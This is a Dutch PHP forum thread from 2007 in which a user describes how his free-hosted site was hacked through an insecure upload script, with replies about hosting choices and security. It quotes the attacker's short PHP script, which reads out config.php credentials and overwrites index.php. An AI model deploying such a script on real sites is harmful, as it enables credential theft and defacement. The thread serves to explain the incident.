site gehackt.

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Back-end PHP Software Developer - Juniorfunctie

Functieomschrijving Wij zijn op zoek naar een PHP Software Developer om ons team te versterken en mee te werken aan de ontwikkeling van eigen IOT-oplossingen. In deze functie ben je verantwoordelijk voor het bouwen van webapplicaties, apps en dashboards voor het uitlezen en managen van sensoren in machines. Je werkt nauw samen met een team van ontwikkelaars en engineers om de beste software-oplossingen te creëren. Jouw werkzaamheden zien er als volgt uit: Je bent in deze rol verantwoordelijk voor het ontwerpen, ontwikkelen en onderhouden van webapplicaties en softwaretoepassingen voor in-house ontwikkelde IOT oplossingen. Je werkt aan complexe databases en back-end

Bekijk vacature »

Frontend Developer Vue Nuxt HBO Javascript

Samengevat: Deze werkgever levert elke dag betere digitale gebruikerservaringen. Ben jij geschikt als frontend Developer? Heb je ervaring met Vue en Nuxt? Vaste baan: Front-End Developer HBO €3.100 - €4.600 Zij bieden opdrachtgevers een complete dienstverlening op gebied van ontwerpen en ontwikkelen van websites, zoekmachine optimalisatie, online adverteren, content marketing en conversie verbetering. Zij werken met een eigen ontwikkeld CMS. Bij bij hun werk je aan onze eigen bedrijfsapplicaties. Je ontwikkelt met ons de meest nieuwe software. Wij blinken uit als het gaat om de inzet van technologie. Deze werkgever staat open voor elke nieuwe trend. Onze systemen zijn groot

Bekijk vacature »

Java Front-end Developer

Dit ga je doen Ontwikkelen van nieuwe functionaliteiten in Java met tools als Springboot, MS SQL Server (T-SQL) en JavaScript; Het onderhouden van de (web-)applicaties binnen een complexe omgeving; Werken aan de migratie van een monolithisch systeem naar een architectuur gebaseerd op Kubernetes; Code reviews met collega's en actieve kennisuitdelingsessies voeren; Het uitvoeren van unit- en systeemtests Experimenteren met nieuwe tools en technieken. Hier ga je werken Binnen deze organisatie kom je te werken op de afdeling die gegevens verzamelt vanuit het hele land. Denk hierbij aan vertrouwelijke persoonsgegevens. Het team verwerkt al deze data met als doel het waarborgen

Bekijk vacature »

Ervaren PHP Software Developer

Functieomschrijving Voor een toffe opdrachtgever in regio Breda zijn wij op zoek naar een medior PHP Developer met affiniteit met Laravel. Je komt te werken bij een uitdagende opdrachtgever met supergave klanten in een specifieke branche. Als PHP ontwikkelaar ben je samen met een vooruitstrevende team van 6 collega’s verantwoordelijk voor de ontwikkeling, beheer en het vernieuwen van informatiesystemen voor een specifieke branche. Je ondersteunt complexe uitdagingen van klanten. Vervolgens breng je hun wensen in kaart en vertaalt deze door naar maatwerk software. Affiniteit met Laravel is een pré. Om de klanten zo goed mogelijk te ondersteunen en snel in

Bekijk vacature »

Back-end programmeur

Functieomschrijving Heb jij recent jouw HBO ICT diploma in ontvangst mogen nemen? Of ben je toe aan een nieuwe uitdaging? Voor een erkende werkgever in regio Waalwijk zijn wij op zoek naar een back-end developer. Kennis of ervaring met C# & SQL is een must! Je houdt je bezig met het ontwikkelen van nieuwe functionaliteiten; Je bent verantwoordelijk voor de beheer en ontwikkeling van de software; Je draagt bij aan de implementatie van aanpassingen, verbeteringen en aanvullingen in de C# based applicaties; Je test de software en ontwikkelt deze door; Je brengt de aanpassingssuggesties van klanten in kaart, om ze

Bekijk vacature »

Front-end PHP Developer

Dit ga je doen Bouwen van de frontend van een nieuwe applicaties; Verbeteren van de user experience; Opstellen van een style guide; Schakelen met collega developers over de te bouwen oplossing; Je speelt een belangrijke rol in het neerzetten van het nieuwe systeem; Werken met o.a. Symfony 6, API Platform, Twig, Javascript, Redis Automatiseren van processen; Koppelen van verschillende functionaliteiten; Unit tests, integration tests, end-to-end tests; In de toekomst ga je nog werken aan andere projecten. Hier ga je werken Voor onze vaste opdrachtgever in de regio Breda zijn wij op zoek naar een Frontend Developer. Het betreft een organisatie

Bekijk vacature »

Infrastructure Developer

Vacature details Vakgebied: Software/IT Opleiding: Senior Werklocatie: Eindhoven Vacature ID: 12945 Introductie Our client is one of the most innovative companies within the Netherlands. Currently we are looking for an Infrastructure Platform Engineer. Within this role you will be developing the infrastructure. Functieomschrijving Within this role you are responsible in the development of our distributed data and compute platform infrastructure. You will design, develop and implement new features and fixes. Next to this you will integrate and configurate other packages that supports the development of tuning applications within the organisation. You will support customer sites remotely. Design and implement the

Bekijk vacature »

Front-End Developer

Als Front-End Developer bij Coolblue verbeter je de gebruiksvriendelijkheid van onze webshop voor miljoenen klanten. Wat doe je als Front-End Developer bij Coolblue? Als Front-end Developer werk je aan de gebruiksvriendelijkheid van onze webshop voor miljoenen klanten. Je vindt het leuk om samen te werken met de UX designer om stories op te pakken. Je krijgt energie van het bedenken van creatieve oplossingen en presenteert dit graag binnen het team. Daarnaast ben je trots op je werk en verwelkomt alle feedback. Ook Front-end Developer worden bij Coolblue? Lees hieronder of het bij je past. Dit vind je leuk om te

Bekijk vacature »

Front-End React Developer

As a Front-End React Developer you improve the user-experience of our web applications for your colleagues in Coolblue. How do I become a Front-End React Developer at Coolblue? As a Front-End React Developer you are responsible for developing user interface components and implementing them using React.js concepts and workflows. You work with the UX Designer and get energy from coming up with creative solutions and present these within the team. During the day you gather and welcome feedback on your technical and soft skills. Would you like to become a Front-End React Developer at Coolblue? Read below if the job

Bekijk vacature »

PHP ontwikkelaar

Functie Met een complex en uitgebreid e-commerce platform, een eigen PIM-systeem en eigen scan applicatie – krijg jij dagelijks te zien hoe jouw werk gebruikt wordt door miljoenen gebruikers. En we staan qua development pas in de startblokken, aangezien er nog meerdere projecten op de plank liggen te wachten! Ons huidige development team bestaat uit 8 programmeurs. Er wordt dagelijks gereflecteerd op geschreven code, Scrum taken en kennisdelen onderling is een must. Onze voertaal binnen ons team is Engels, dit omdat wij twee internationale collega’s hebben. Ons huidige “IT Landschap” bestaat voornamelijk uit allerlei losse onderdelen die individueel, maar ook

Bekijk vacature »

Senior Front end developer

Functie Wij zijn op zoek naar een ambitieuze, zelfsturende Front-end Expert die ons (internationale) team komt versterken. Onze huidige software development afdeling bestaat uit 7 developers en designers. Wij zijn een écht softwarehuis, dus ervaring in software development is wel echt een must. Er wordt tegelijkertijd aan meerdere projecten gewerkt, voor mooie toonaangevende klanten. Je hebt dus regelmatig te maken met deadlines en opleveringen. Een deel van onze omgeving is in Angular.JS. Dit deel wordt langzamerhand omgebouwd naar de nieuwste versie van Angular. Jouw werkzaamheden zullen bestaan uit: Het aansturen en begeleiden van jouw collega’s Het implementeren van visuele elementen

Bekijk vacature »

.NET Software Developer

Dit ga je doen Als .NET Software Developer zul jij je voornamelijk bezig houden met: Het van scratch af aan bouwen van applicaties (.NET, C#, Bootstrap, KnockoutJs en WebAPI2); Het testen van jouw code d.m.v. het uitvoeren van unittesten; Het oplossen van bugs in de code; Het onderhouden van contact met collega's betreffende de door jouw ontwikkelde applicaties; Het verbeteren en doorontwikkelen van maatwerkapplicaties. Hier ga je werken Jij gaat aan de slag als .NET Software Developer en gaat je focussen op het bedenken, ontwikkelen en testen van maatwerkapplicaties in voornamelijk C#. Dit ga je doen bij een grote, internationale

Bekijk vacature »

Medior/senior Back-end developer wanted!

Functie Because of the growth within the company, we are looking for reinforcement in the devlopmenttean. As a back-end developer you build the company software that helps us with the primary processes. A fun (internal) project in which you continuously develop the software! You will work in a small team, we have daily stand-ups and a scrum session every fortnight, led by our Scrum Master. During these sessions, you get the opportunity to present your ideas and discuss them with your fellow developers and the Product Owner. Within the development teams, we use Trello, Gitlab, Jiira, Confluence and Boockstack. They

Bekijk vacature »

Fullstack JavaScript Developer Webapplicaties

Bedrijfsomschrijving Voor deze organisatie ben ik op zoek naar een getalenteerde Fullstack JavaScript Developer. Ze is een snelgroeiend software development agency dat zich richt op het ontwikkelen van moderne webapplicaties en complexe systemen voor haar klanten. Ze is gevestigd onder de rook van Utrecht en heeft als doel om tot de top van de Nederlandse agencies te behoren. Deze organisatie maakt softwareoplossingen voor verschillende soorten bedrijven. Innovatie staat hoog in het vaandel en je zult dus met nieuwe technieken aan de slag gaan. Ze hebben klanten in vele branches zitten, zoals retail, finance, gezondheid en onderwijs. De diverse klanten zorgen

Bekijk vacature »

Database Developer

Functie omschrijving Voor een logistieke dienstverlener in omgeving Zuid Beijerland zijn wij op zoek naar versterking. Weet jij als geen ander systemen aan elkaar te koppelen en heb jij goede kennis van SQL en UML, lees dan snel verder! Jouw taken zien er als volgt uit: Je bent in deze rol voornamelijk verantwoordelijk voor het bouwen, implementeren en beheren van koppelingen tussen de bestaande systemen (zowel business 2 business als application 2 application). Daarnaast inventariseer je de wensen van in- en externe klanten, die je vervolgens samen met je collega's, vertaalt naar technische specificaties, die jullie zelf ontwikkelen en implementeren.

Bekijk vacature »

Pagina: 1 2 volgende »

Eric

eric

15/06/2007 18:34:00
Quote Anchor link
Hallo mijn site is ongeveer 1,5 uur geleden gehackt. Ik wilde naar mijn site gaan en opeens stond er dit: (http://eric.byethost8.com). wat moet ik nu doen??

Edit:

Topic gaat niet specifiek over php, daardoor verplaatst naar de koffiehoek.

moderator: Danny Roelofs
Gewijzigd op 01/01/1970 01:00:00 door Eric
 
PHP hulp

PHP hulp

14/05/2024 14:50:04
 
Ponzi

Ponzi

15/06/2007 18:52:00
Quote Anchor link
Eens bellen naar de host? Of het lijkt een gratis accountje. Heeft hij niet gewoon je index.php (.html) vervangen?
 
Jurgen assaasas

Jurgen assaasas

15/06/2007 19:04:00
Quote Anchor link
Zie je wel vaker bij zulk soort hosts. Ik raad je aan een betaalde host te nemen.
 
Aaa Trump

aaa Trump

15/06/2007 19:26:00
Quote Anchor link
whhahahahahahaha Hafohumor!!! xD.

Jah tegen woordig heb je voor 100 euro per jaar al een leuke hosting!
 
Kwastie

Kwastie

15/06/2007 19:28:00
Quote Anchor link
wat dacht je van 25 euro, 3 gb hd, 60 gb traffic. domeinnaam(nee geen reclame, gewoon aanbeveling) www.antagonist.nl, zeer weinig downtime :D mischien alternatief..?
 
Luke Banning

Luke Banning

15/06/2007 20:19:00
Quote Anchor link
robin schreef op 15.06.2007 19:26:
whhahahahahahaha Hafohumor!!! xD.

Jah tegen woordig heb je voor 100 euro per jaar al een leuke hosting!

Ermmmm.... en jij trekt natuurlijk zo 100 euro uit je achterzak?
Je hebt al dingen vanaf 5 euro man, waar een simpele site meer dan voldoende aan heeft
 
Aaa Trump

aaa Trump

15/06/2007 21:06:00
Quote Anchor link
Ik praat over per jaar. :D
 
K i p

K i p

15/06/2007 21:08:00
Quote Anchor link
Luke ook
 
PHP Newbie

PHP Newbie

15/06/2007 21:08:00
Quote Anchor link
robin schreef op 15.06.2007 21:06:
Ik praat over per jaar. :D


Ik betaal nog géén 28 euro per jaar..

8 GB trafic
150 MB webruimte
Uitstekende support
...
 
Menno

menno

15/06/2007 21:11:00
Quote Anchor link
Nou dat is best wel slecht :S
Je kan voor dat geld veel beter krijgen :S
 
Marco PHPJunky

Marco PHPJunky

15/06/2007 21:14:00
Quote Anchor link
ja dat lijkt me wel ja zet anders een eigen server op :P:P
 
Frank -

Frank -

15/06/2007 21:21:00
Quote Anchor link
menno schreef op 15.06.2007 21:11:
Nou dat is best wel slecht :S
Je kan voor dat geld veel beter krijgen :S
Kun je er dan ook even bij vertellen wat jouw definities van goed en slecht zijn?

En bedenk ook, je weet pas of je een goede hostingprovider hebt, als alles goed fout is gegaan. Wanneer hij de boel dan in no-time weer online heeft, dan heb je een goede provider. De meeste knakenboeren geven echter niet thuis wanneer de boel in het 100 loopt...
 
Marco PHPJunky

Marco PHPJunky

15/06/2007 21:24:00
Quote Anchor link
als de host providers hun goede naam wilen behouden of krijgen dan zullen ze eigenlijk wel moeten.... vind ik maarja of ze het doen is ten 2de natuurlijk..
 
Frank -

Frank -

15/06/2007 21:29:00
Quote Anchor link
Marco schreef op 15.06.2007 21:24:
als de host providers hun goede naam wilen behouden of krijgen dan zullen ze eigenlijk wel moeten.... vind ik maarja of ze het doen is ten 2de natuurlijk..
Doen en kunnen, zijn 2 totaal verschillende zaken! Zolang een server draait, heb je geen enkele kennis nodig om de boel online te houden. Stort de boel echter in, dan wordt het een ander verhaal... Bij menig provider ontbreekt de benodigde kennis en kunde om een server goed te beheren. Daarnaast ontbreken noodprocedures of worden deze nooit getest.

Voor een paar euro in de maand kun je niet verwachten dat je een provider met royale service en kunde inhuurt. Bestaat gewoon niet, de kosten liggen namelijk veel hoger. Voor een hobby-site maakt dat echter niet uit, dan is 1 euro per maand een mooi goedkope hobby!

Veel plezier
 
PHP Newbie

PHP Newbie

15/06/2007 23:14:00
Quote Anchor link
PHP Newbie schreef op 15.06.2007 21:08:
robin schreef op 15.06.2007 21:06:
Ik praat over per jaar. :D


Ik betaal nog géén 28 euro per jaar..

- 8 GB trafic
- 150 MB webruimte
- Uitstekende support (Echt uitstekende, problemen over het algemeen dezelfde dag opgelost)
...

- Noodstroomvoorziening
- Je wordt overal van op de hoogte gehouden
- Onderhoud gaat meestal gepaard zonder downtime. Is dit wel gebeurd, wordt dit aan je verteld.
- Support medewerkers met kennis van zaken
- weinig downtime
- Fallback (mail)servers

Voor al dit vind ik zelf dat ik zeker niet teveel betaal...
 
Eric

eric

15/06/2007 23:36:00
Quote Anchor link
ik heb antwoord gekregen van mijn provider. ze hebben mij een log gegeven waar een naam en ip in staat.

Namen zijn, Jurgen en Leon.
Jurgen heeft het volgende script geschreven:

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
<?header('Content-Type: application/octet-stream');

readfile("../../config.php");

$file = 'index.html';
$newfile = '../../index.php';

if (!copy($file, $newfile)) {
echo "failed to copy $file...\n";
}?>


hierop reageerde mijn provider op: Hi there ,

It appears they used some upload script you had installed , to upload there php script (into /upload/images) , then from there they ultimately had control of your webspace (as they could upload php scripts to it.. )

Log file attached .

Regards
YourSupportGroup.com
A member of the Byethost Internet Group

(ik zet het log er niet op vanwege de privacy)
-----------------------------

Jurgen zei later tegen mij dat hij in mijn config. php keek om ervan te leren dat het beter beveiligd moet worden. Echter heeft hij het config.php inhoud door gestuurd naar Leon. Leon heeft vervolgens ALLE mappen en scripts veranderd, waardoor ik nu echt alles kwijt ben. Leon beweert dat hij nog een backup van de scripts heeft gemaakt, maar die wil hij niet teruggeven.

Als ik het goed begrijp is Leon toch strafbaar bezig en Jurgen toch ook? Nog erger, deze mensen ken ik, ze waren mijn vrienden./
 
- SanThe -

- SanThe -

15/06/2007 23:39:00
Quote Anchor link
PHP Newbie schreef op 15.06.2007 23:14:
- Noodstroomvoorziening Logisch. Zonder dat mag je jezelf niet eens host noemen vind ik.
- Je wordt overal van op de hoogte gehouden Ook logisch lijkt mij.
- Onderhoud gaat meestal gepaard zonder downtime. Is dit wel gebeurd, wordt dit aan je verteld. Dat moeten ze van tevoren melden en niet achteraf.
- Support medewerkers met kennis van zaken Is altijd moeilijk in te schatten. Je komt daar eigenlijk alleen achter als je er zelf veel verstand van hebt.
- weinig downtime Ook logisch.
- Fallback (mail)servers Geven vaak meer problemen dan voordelen.
 
PHP Newbie

PHP Newbie

15/06/2007 23:45:00
Quote Anchor link
SanThe schreef op 15.06.2007 23:39:
PHP Newbie schreef op 15.06.2007 23:14:
- Noodstroomvoorziening Logisch. Zonder dat mag je jezelf niet eens host noemen vind ik.
- Je wordt overal van op de hoogte gehouden Ook logisch lijkt mij.
- Onderhoud gaat meestal gepaard zonder downtime. Is dit wel gebeurd, wordt dit aan je verteld. Dat moeten ze van tevoren melden en niet achteraf.
- Support medewerkers met kennis van zaken Is altijd moeilijk in te schatten. Je komt daar eigenlijk alleen achter als je er zelf veel verstand van hebt.
- weinig downtime Ook logisch.
- Fallback (mail)servers Geven vaak meer problemen dan voordelen.


SanThe, dit valt bij een hoop hosters toch nog altijd vies tegen. En die fallback mailservers werken uitstekend :-)
 
Frank -

Frank -

15/06/2007 23:46:00
Quote Anchor link
Tja, lullig dat het is gebeurd, maar het is ook wel een klein beetje je eigen schuld. Je fiets niet op slot zetten en dan klagen dat die is verdwenen, is net zo iets...

Hopelijk heb je hier iets van geleerd: Het grote boze internet vereist goede beveiliging!

En verder: Je zou eens bij de politie aangifte kunnen doen. Het is alleen afhankelijk van de locale kennis en kunde of ze er ook iets mee gaan doen. Leon vraagt overigens wel om een kleine persoonlijke verbouwing... Maar dat heb ik natuurlijk niet gezegd, dan ben jij namelijk net zo strafbaar!

Ps. Ga lekker verder klooien met PHP, maar zet geen belangrijke data op jouw server wanneer je niet zeker weet of je de beveiliging goed op orde hebt. En van je fouten leer je, vergeet dat vooral niet.
 
Eric

eric

15/06/2007 23:49:00
Quote Anchor link
is het dan verbeterd dat ik mijn config.php voortaan bijvoorbeeld verander in configlalajekomtertochnietachter.php ??:P
 
Jurgen

Jurgen

16/06/2007 00:02:00
Quote Anchor link
Ik heb Eric belooft hem te gaan helpen met het beveiligen van alles, ik wil even kwijt dat ik Eric alleen maar even wou laten zien hoe simpel het is om zijn uploadscript te misbruiken. Helaas is het uit de hand gelopen en dat vind ik jammer. Ik ken Eric al 2 jaar en ik heb echt nooit iets lulligs willen doen tegen em. Wat Leon betreft is hij echt bij mij over de lijn gegaan. Leon is van het type 'ik weet niet wanneer ik moet ophouden' en straks ben ik de sjaak omdat hij nu erics bestanden heeft die hij niet wil teruggeven.

Jurgen
 

Pagina: 1 2 volgende »



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.